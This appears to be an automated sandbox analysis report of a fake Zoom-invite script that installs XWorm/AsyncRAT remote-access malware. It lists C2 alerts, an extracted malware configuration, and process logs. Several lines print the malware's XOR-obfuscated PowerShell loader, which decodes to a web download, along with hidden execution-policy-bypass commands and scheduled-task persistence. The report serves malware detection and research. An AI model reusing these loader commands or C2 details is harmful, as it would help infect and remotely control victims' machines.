            2024-09-25T09:30:40.667562+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:30:41.470968+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:30:41.590089+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:30:41.708243+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:30:41.713110+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:30:45.209150+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:30:47.033200+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:30:52.223080+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:30:52.340947+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:31:02.499100+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:31:02.605640+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:31:02.923532+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:31:10.034026+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:31:13.345894+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:31:24.001982+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:31:31.318663+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:31:34.829609+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T09:28:02.698933+020028528741Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:28:32.951933+020028528741Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:28:32.951985+020028528741Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:29:02.698223+020028528741Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:29:32.721145+020028528741Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:02.734815+020028528741Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:32.749519+020028528741Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:31:02.855550+020028528741Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:31:32.747080+020028528741Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T09:29:52.022973+020028531931Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: ALBANIAH3CKER.WORK.GDAvira URL Cloud: Label: malware
            Source: 0000000B.00000002.4600814015.0000000002A51000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["ALBANIAH3CKER.WORK.GD"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 18.2.RegSvcs.exe.400000.0.unpackString decryptor: ALBANIAH3CKER.WORK.GD
            Source: 18.2.RegSvcs.exe.400000.0.unpackString decryptor: 7000
            Source: 18.2.RegSvcs.exe.400000.0.unpackString decryptor: <123456789>
            Source: 18.2.RegSvcs.exe.400000.0.unpackString decryptor: <Xwormmm>
            Source: 18.2.RegSvcs.exe.400000.0.unpackString decryptor: XWorm V5.6
            Source: 18.2.RegSvcs.exe.400000.0.unpackString decryptor: USB.exe

            Software Vulnerabilities

            barindex
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 94.198.50.33:7000 -> 192.168.2.6:49719
            Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 94.198.50.33:7000 -> 192.168.2.6:49719
            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49719 -> 94.198.50.33:7000
            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49719 -> 94.198.50.33:7000
            Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49719 -> 94.198.50.33:7000
            Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49710 -> 188.114.97.3:443
            Source: Malware configuration extractorURLs: ALBANIAH3CKER.WORK.GD
            Source: unknownDNS query: name: paste.ee
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficTCP traffic: 192.168.2.6:49719 -> 94.198.50.33:7000
            Source: Joe Sandbox ViewIP Address: 94.198.50.33 94.198.50.33
            Source: Joe Sandbox ViewASN Name: DHUBRU DHUBRU
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: paste.ee
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficDNS traffic detected: DNS query: ALBANIAH3CKER.WORK.GD
            Source: RegSvcs.exe, 0000000B.00000002.4600814015.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            System Summary

            barindex
            Source: 18.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000012.00000002.2958994280.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = InvOkE-eXpreSSion ( ( [char[]] (62 , 72,39,61 ,83 , 127,66,50,84 , 127 , 61 , 33 , 62, 72, 95, 58, 39, 58 , 62 ,72 ,49 , 61,77 , 55, 85, 88,80, 61, 33 , 62, 72 ,95 ,94, 58, 39,58 ,62, 72, 95,49, 61 , 127 ,89,78 , 58 ,84,127,78,52 , 77 , 61, 33, 62,74 ,91 , 89 , 39 ,61, 127 , 88 , 89 ,86, 61, 33,62 ,98,98, 58 ,39 ,58, 62, 74, 91 , 89 , 49, 61, 83, 127,84, 61,33, 62,72,85,58, 39 ,58 , 62 ,98 , 98 ,49,61,78,51 , 52, 94 ,85 ,77 ,84, 86 , 85,61,33, 62, 96 , 96, 39 , 61 ,85, 90,42 , 50 ,60 ,50 ,61 ,61 , 114,110 , 110 , 106, 105,32, 53, 53 , 106,123 ,105, 110 , 127,52,127,127, 53, 104, 53,40, 92,94,96,126, 53, 42, 61, 61,51 , 61 , 52,72, 127 ,74,86 , 91, 89 , 127 ,50,61,85 ,90,42, 50, 60, 61 ,54 , 61, 91 ,94, 73,78 , 72, 83 ,84 ,93,61,51, 33 ,115 ,127,98 , 50,62,72 ,95, 94 , 49 , 62,72 , 85 , 49, 62 ,96 , 96 , 51 ) | %{[char] ( $_-BXOR '0x1a' ) } )-JOIN'') ; powershell $ReDrO"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = InvOkE-eXpreSSion ( ( [char[]] (62 , 72,39,61 ,83 , 127,66,50,84 , 127 , 61 , 33 , 62, 72, 95, 58, 39, 58 , 62 ,72 ,49 , 61,77 , 55, 85, 88,80, 61, 33 , 62, 72 ,95 ,94, 58, 39,58 ,62, 72, 95,49, 61 , 127 ,89,78 , 58 ,84,127,78,52 , 77 , 61, 33, 62,74 ,91 , 89 , 39 ,61, 127 , 88 , 89 ,86, 61, 33,62 ,98,98, 58 ,39 ,58, 62, 74, 91 , 89 , 49, 61, 83, 127,84, 61,33, 62,72,85,58, 39 ,58 , 62 ,98 , 98 ,49,61,78,51 , 52, 94 ,85 ,77 ,84, 86 , 85,61,33, 62, 96 , 96, 39 , 61 ,85, 90,42 , 50 ,60 ,50 ,61 ,61 , 114,110 , 110 , 106, 105,32, 53, 53 , 106,123 ,105, 110 , 127,52,127,127, 53, 104, 53,40, 92,94,96,126, 53, 42, 61, 61,51 , 61 , 52,72, 127 ,74,86 , 91, 89 , 127 ,50,61,85 ,90,42, 50, 60, 61 ,54 , 61, 91 ,94, 73,78 , 72, 83 ,84 ,93,61,51, 33 ,115 ,127,98 , 50,62,72 ,95, 94 , 49 , 62,72 , 85 , 49, 62 ,96 , 96 , 51 ) | %{[char] ( $_-BXOR '0x1a' ) } )-JOIN'') ; powershell $ReDrO" Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_010681D811_2_010681D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0106551011_2_01065510
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0106BBD811_2_0106BBD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01065DE011_2_01065DE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0106AE9811_2_0106AE98
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_010651C811_2_010651C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01060BA011_2_01060BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_00FC0B9218_2_00FC0B92
            Source: Zoom_Invite.call-660194855683.wsfInitial sample: Strings found which are bigger than 50
            Source: 18.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000012.00000002.2958994280.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: classification engineClassification label: mal100.troj.expl.evad.winWSF@27/8@4/1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.logJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\IFhL8Is8edtDA6ZA
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2544:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ooigou4p.fde.ps1Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zoom_Invite.call-660194855683.wsf"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = InvOkE-eXpreSSion ( ( [char[]] (62 , 72,39,61 ,83 , 127,66,50,84 , 127 , 61 , 33 , 62, 72, 95, 58, 39, 58 , 62 ,72 ,49 , 61,77 , 55, 85, 88,80, 61, 33 , 62, 72 ,95 ,94, 58, 39,58 ,62, 72, 95,49, 61 , 127 ,89,78 , 58 ,84,127,78,52 , 77 , 61, 33, 62,74 ,91 , 89 , 39 ,61, 127 , 88 , 89 ,86, 61, 33,62 ,98,98, 58 ,39 ,58, 62, 74, 91 , 89 , 49, 61, 83, 127,84, 61,33, 62,72,85,58, 39 ,58 , 62 ,98 , 98 ,49,61,78,51 , 52, 94 ,85 ,77 ,84, 86 , 85,61,33, 62, 96 , 96, 39 , 61 ,85, 90,42 , 50 ,60 ,50 ,61 ,61 , 114,110 , 110 , 106, 105,32, 53, 53 , 106,123 ,105, 110 , 127,52,127,127, 53, 104, 53,40, 92,94,96,126, 53, 42, 61, 61,51 , 61 , 52,72, 127 ,74,86 , 91, 89 , 127 ,50,61,85 ,90,42, 50, 60, 61 ,54 , 61, 91 ,94, 73,78 , 72, 83 ,84 ,93,61,51, 33 ,115 ,127,98 , 50,62,72 ,95, 94 , 49 , 62,72 , 85 , 49, 62 ,96 , 96 , 51 ) | %{[char] ( $_-BXOR '0x1a' ) } )-JOIN'') ; powershell $ReDrO"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "MSFT_ScheduledTask (TaskName = "MicroSoftVisualsUpdater", TaskPath = "\")"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = InvOkE-eXpreSSion ( ( [char[]] (62 , 72,39,61 ,83 , 127,66,50,84 , 127 , 61 , 33 , 62, 72, 95, 58, 39, 58 , 62 ,72 ,49 , 61,77 , 55, 85, 88,80, 61, 33 , 62, 72 ,95 ,94, 58, 39,58 ,62, 72, 95,49, 61 , 127 ,89,78 , 58 ,84,127,78,52 , 77 , 61, 33, 62,74 ,91 , 89 , 39 ,61, 127 , 88 , 89 ,86, 61, 33,62 ,98,98, 58 ,39 ,58, 62, 74, 91 , 89 , 49, 61, 83, 127,84, 61,33, 62,72,85,58, 39 ,58 , 62 ,98 , 98 ,49,61,78,51 , 52, 94 ,85 ,77 ,84, 86 , 85,61,33, 62, 96 , 96, 39 , 61 ,85, 90,42 , 50 ,60 ,50 ,61 ,61 , 114,110 , 110 , 106, 105,32, 53, 53 , 106,123 ,105, 110 , 127,52,127,127, 53, 104, 53,40, 92,94,96,126, 53, 42, 61, 61,51 , 61 , 52,72, 127 ,74,86 , 91, 89 , 127 ,50,61,85 ,90,42, 50, 60, 61 ,54 , 61, 91 ,94, 73,78 , 72, 83 ,84 ,93,61,51, 33 ,115 ,127,98 , 50,62,72 ,95, 94 , 49 , 62,72 , 85 , 49, 62 ,96 , 96 , 51 ) | %{[char] ( $_-BXOR '0x1a' ) } )-JOIN'') ; powershell $ReDrO" Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
